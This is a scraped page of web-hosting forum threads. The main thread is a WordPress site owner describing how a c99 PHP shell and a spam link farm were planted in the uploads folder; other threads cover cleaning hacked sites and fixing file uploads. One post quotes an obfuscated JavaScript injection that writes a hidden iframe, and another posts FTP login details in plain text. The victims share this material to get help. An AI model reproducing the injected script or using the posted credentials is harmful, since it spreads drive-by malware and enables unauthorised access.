Site Hacked Via Php Script Placed In WordPress Uploads Directory

Apr 7, 2007

First of all, I discoverd this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but merely a customer of a web hosting company, hostrocket.com

I have an installation of WordPress 2.1 WordPress creates a couple world writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and exectue a php script in my world writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do not have much knowledge about these things and consequently can't talk very inetlligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, what I can do to mitigate it from reocurring in the future.

Some of the stuff that was in the directory is as follows...

2421
bindz
h4ckerz
mass.pl p
trace-kmod
2421.1
brk
help.php
mybindshell
ptrace24
99.php
coredump
idf.php
netcat
pwned
CMD.php
dc.pl
index.html
online
r0nin
TMT.htm
elfdump
kmod2
online.tar.gz
raptor
TTdummyfile
gcc
krad3
prctl2
uselib24
bind.pl g
cc.1
list.txt
ptrace

The "online" directory contained over 40MB of directories such as...

abortion diethylpropion
accounting diflucan
accupril diovan
acne distance-education
actonel dospan
actos dovonex
acyclovir doxycycline
adderall drug
adipex drug-rehab
adventure-travel drug-test
adware dvd
adware-spyware e-pathto
affiliate-program effexor
air-travel elavil
aldara enalapril
alprazolam equity-loan
altace estradiol
amaryl evista
ambien fioricet
amitriptyline flexeril
amoxicillin flonase
amoxil florida-lottery
antivirus fluoxetine
atenolol fosamax
ativan free-poker
avandia free-slots
avapro free-spyware
baclofen furniture
bankruptcy gambling
bextra home-equity-loan
biaxin home-loan
bingo hosting
black-jack hotel
blackjack hydrocodone
blackjack-game images
bontril imitrex
britney-spears insurance-life
business internet-betting
buspar internet-gambling
buspirone loan
butalbital loans
buy-hardware lortab
buy-phentermine lottery
california-lottery lotto
captopril mesothelioma
car mortgages
car-insurance online-black-jack
carisoprodol online-casino
cars online-gambling
cartia online-loan
cash-loan online-pharmacy
casino online-poker
casino-games online-roulette
casino-las-vegas online-slot
celebrex payday-advances
celebrex-online phentermine
celexa poker
celexa-online poker-chips
cephalexin poker-game
cialis poker-tables
cigarette refinance
cigarettes refinance-house
cipro refinance-loan
claritin refinancing
clindamycin ringtones
clonazepam roulette
clonidine slot-machine
codeine slot-machines
consolidate-card slots
cozaar steroids
credit structured-settlement
credit-card texas-holdem
credit-card-debt texas-holdem-poker
credit-card-debt-consolidation texas-holdem-rules
creditcard texas-lottery
cyclobenzaprine tramadol
darvocet travel
dating travel-insurance
debt-consolidation ultram
debtcard valium
denavir viagra
diazepam vicodin
diclofenac video-poker
didrex wagering
diet-pills xanax

As you can see, I was had in a BIG way.

So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.

The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.

So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?

What amazed me was this particular script, "99.php" actually when viewed in a browser window titled phpshell was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL, to view my webspace, and do all sorts of nasty things. Talk about a wake-up call!

Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.

View 8 Replies


ADVERTISEMENT

SITE WAS HACKED!

Jul 27, 2008

A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?

View 6 Replies View Related

My Site Has Been Hacked

Oct 1, 2007

One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.

Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.

I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.

View 10 Replies View Related

Site Up And Down- Am I Being Hacked

Jun 22, 2009

My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!

And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.

Quote:

<script type="text/javascript" src="swfobject.js"></script>

<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>

What the heck is going on?

View 12 Replies View Related

Site Is Hacked

Mar 4, 2008

I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:

[url]

View 8 Replies View Related

Best Way To Clean A Hacked Site?

Nov 9, 2009

What is the best way to clean a hacked site?

All of the pages have iframe injection and my only backup was made after the attack.

I have hundreds of pages, do I have to edit them all manually?

View 7 Replies View Related

Unknown Script/hacked Site

Mar 10, 2008

For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.

The script looks like this: ....

View 0 Replies View Related

Youtube Clone Site Been Hacked

Nov 18, 2007

The database has been changed. Some of the data has been altered

The tilte has been change to: Hacked By Genc_Rapci

View 5 Replies View Related

Shell Uploaded - Site Hacked - How To Trace ?

Nov 6, 2008

Shell uploaded - Site hacked - How to trace?

Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....

View 7 Replies View Related

Transfering Wordpress Site From 1and1 To * ?

Jun 7, 2009

I'm having sort of a problem figuring out how to transfer one of my wordpress blogs to another host and was wondering if there is anyone experienced here that could offer their knowledge

Basically I signed up for hosting with 1and1 when I got my first site (I didn't know any better). I created a blog out of that site but now I want to transfer it to another host such as hostgator or what-have-you.

How can I do this without having to start over from scratch and lose everything?

View 4 Replies View Related

Xcache Or Eaccelerator For Wordpress Site

Oct 15, 2009

I have been trying to figure out which one I should be using for my wordpress site. I have read some discussion but after reading it all I am on the fence. Will Xcache work with cpanel?

The server is running XEN, with cpanel/whm, php5

The server spec is:
3.0Ghz - 8 cpu's
2048MB RAM, and 2048MB SWAP

I have also heard some people using litespeed server, would this be any good?

View 8 Replies View Related

Cheap Hosting For Wordpress MU Site

Dec 8, 2008

Cheap Hosting for Wordpress MU site

I have recently bought a domain for blgos for designers and was wondering what hosting would be best to start of with and which compan to go with.

Shall I start with shared hosting then move to a VPS when needed?
Which company shall I go with?

Are Slicehost good?

Because I have just bought the domain, I won't need alot of bandwidth and space, but I will need to be able to upgrade quickly and easily. Oh, and cheaply.

I will put some advertising on the site so I will get a bit of money from that, but I want it to be cheap as I don't have much money at the moment. I might also have a 'Premium' members part where people get extra disc space, etc. So I will also get money from that to go towards the hosting, domain registration, etc.

View 11 Replies View Related

Plesk 11.x / Linux :: Upload To Virtual Server - Wordpress Site Developed Locally

Sep 11, 2014

We need to upload to a virtual server (managed with Plesk 11.5) a Wordpress site developed locally. We made this operations without problems many times on other hostings managed with custom panels, non-Plesk.

On the virtual server with Plesk, however, once the files are uploaded via FTP, the database via phpMyAdmin and updated the Wordpress configuration file, when you go to visit the website, it does not display anything and the browser opens the download window for a text file called "download" that contains the code of the file index.php of WordPress.

View 7 Replies View Related

Fast Uploads

May 25, 2009

i have moved my hosting to a new provider and i was wondering what is the quickest way to upload my 500MB files to the new server? Is there anyway i can speed this up like have a dedicated uplink port to my server, or via VPN or something, cos at the moment i have an upload speed of around 10KB/s,

View 5 Replies View Related

Secure Uploads

Jun 8, 2009

My requirements are 500MB, 5GB bandwidth, rails and postgres, $5-6 per month. It looks like there are many providers out there that are offer that.

However the only uploading method shared hosters seem to offer - or at least the only method they advertise - is FTP. Coming from a university and sysadmin background, I thought that anything that sends passwords over the wire unencrypted had died long ago (except HTML forms and legacy systems).

Are there any shared hosting services that allow a more secure upload method (e.g. scp, rsync-over-ssh, even webdav-over-ssl)?

View 4 Replies View Related

SERVAGE FTP Uploads

Jul 9, 2008

company for over a month or 2
contacting them (support tickets) is as useless as not!..
their reply is always simply: we checked and nothing at our side! (asking for a clarification simply gets u nothing!)

problem is simply ONLY with ftp uploads!
my line upstream is 256Kbps (32 KB/sec) and down 1Mbps and i was always capable of pushing up to 2.2 GB/day ((i monitor my traffic all the time))
but just recently some weird things started appearing...

before uploads would never go under 27-26 KBs on my FTP client
now it's so normal finding it dropping to 15,10,4,2, 0!
ya a whole 0!
and that's not just for a second or two
it can stay like that for maybe aminute then go up back again!
And upon watching my traffic statistics closely, i found myself pushing at the most 1.6 GB only a day!
another funny thing is that files used to appear AND PARTIALLY in the root directory instead of the desired directory!
so WHAT IS UP!

View 14 Replies View Related

Uploads Not Working

Aug 21, 2007

On my dedic the uploads arent working... I am talking about normal http upload.

In my php.ini uploads are set as On and max file is 100mb.. my tmp is 777

possible error be?

View 10 Replies View Related

403 Forbidden When I Try To Access Uploads

Jul 15, 2008

Ok i get 403 forbidden when i try to access /uploads/ on my server. I wish to make it public. Can i make a index.html file dispay all of the files in the directory?

View 5 Replies View Related

Hostgator & MySQL Uploads

Jul 31, 2008

I am about to purchase a reseller (Diamond) or maybe just a Hosting (Swamp) but I cant seem to find anywhere details on their MySQL policies.

I have a forum and the database if growing in size daily and im concerned about the database upload limit that may be applied. I have a dedicated server at the moment and im able to request that be changed via php.ini but where would I stand on this if I were to move to shared hosting?

View 3 Replies View Related

Can't Seem To Get File Uploads To Work

Sep 6, 2008

We are going to host our own website. I built up a windows 2003 server. Installed IIS6. I am working on file upload to our website. I can get files to upload to c:Temp but not to c:Inetpubwwwrootourwebsiteupload.

I even set up the upload directory for full sharing with write permissions. Still no help.

I went into windows explorer and right clicked on the upload dir and shared it and set the permissions for read and write. That should take care of NTFS permissions. But no matter what I do when I click on the upload directory and go to properties is shows 'read only'. Can't seem to get that turned off. Until I do I don't believe I can upload a file to the upload directory.

I went into iis6 mgr and and set the upload directory for full access - read and write. That should take care of iis security.

I went to default website (there is only one) and allowed anon login. Even told it use the Administrator account for login with all read and write permissions.

Here is my upload code: ....

View 3 Replies View Related

Causes Of Failed Large Uploads Via Form

May 16, 2008

I just moved to a new, dedicated server this week. My vbulletin forum users typically upload mp3 files under 10MB. At the moment, I can't seem to get anything above 6MB to work.

In vBulletin land, they recommend changing these in php.ini:
upload_max_filesize - Largest size of a file to accept.
post_max_size - Must be larger than upload_max_filesize.
memory_limit - Should be larger than post_max_size.
max_execution_time
max_input_time

I've cranked all of those up and restarted Apache.

I'm still having the same problems. The little window with the form turns white after what appears maybe 5 minutes, but I haven't timed it.

They also mentioned changing the LimitRequestBody in Apache. I appear to be screwing that part up so I created a thread in the Apache forum specificallya about that.
[url]

So I wanted to ask if there were any other possibilities that you guys could think of that would inhibit the file size up uploads via a form.

I'm running httpd-2.2.8 and php-5.2.6. It needs to be said that this forum is config is mostly right out of the box. $_SESSION wouldn't work in php until I changed the directory for it yesterday. So there may be a very basic config setting that I missed.

---------

I decided to check my error logs.

PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 9852343 bytes)

I'm confused. I have an allowed memory of 30MB (give or take). So why does a 10MB file "exhaust" it?

View 3 Replies View Related

Phpsuexec, Forum Uploads On IPB Not Working

Aug 12, 2007

We have a server that we just changed over to PHPSUEXEC. On this server, we have a large IPB (Invision Power Board) forum that we have not been able to get uploads in the forum back working again. Users are getting the message that they don't have permission, and to contact an administrator.

I have looked on IPB's forum for PHPSUEXEC related issues, but can't find a solution. Of couse, before phpsuexec the "upload" folder had 777 file permissions, but under phpsuexec this must be 755. It isn't working though.

Anyone had experience with this with IPB and know how to fix it?

View 2 Replies View Related

Pure-ftpd Crashing During File Uploads

Jan 12, 2008

I've been running pure-ftpd for around 4 months now without any problems, until around 24-48 hours ago file upload has been going a bit loopy.

When you upload a file the speed bounces considerably, and at times pauses on 0kbps until it then dies and fails the upload. 9/10 uploads I have tried have failed.

[R] Opening data connection IP: 74.86.20.181 PORT: 35283
[R] LIST -al
[R] 150 Accepted data connection
[R] 226-Options: -a -l
[R] 226 6 matches total
[R] List Complete: 374 bytes in 0.64 seconds (0.6 KB/s)
Transfer queue completed
1 File failed to transfer
[R] Connection lost: chacha
We have restarted pure-ftpd a number of times, but have had no luck.

Please could you try and upload a file (at least 10mb and please nothing dodgey) to this FTP account:

address: chacha.99k.org
user: chacha@99k.org
pass: password

And output the result.

Does anyone here have experience with pure-ftpd and would possibly consider giving my system a "once over"?

View 2 Replies View Related

Whos Is Responsible If Someone Uploads Illegal Content

Dec 24, 2007

I want to get a VPS to hold my sites and the websites i build for people.

I'm not sure about what happens if a client uploads something they shouldnt - be it porn, warez or whatever.

As a server owner, do i risk getting in trouble? Or am i simply the contact person .

I can't check every file that people might upload.

View 1 Replies View Related

PHP Session/timeout Settings For Large Video Uploads

Mar 23, 2008

I'm currently a video sharing site and I'm aiming for large videos (around 500MB - 1GB), now I have to take into account an average user should only be able to do 30k-50k per sec.

So the session_timeout and upload_max need to be adjusted. Anybody with experience with large upload sites ?

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved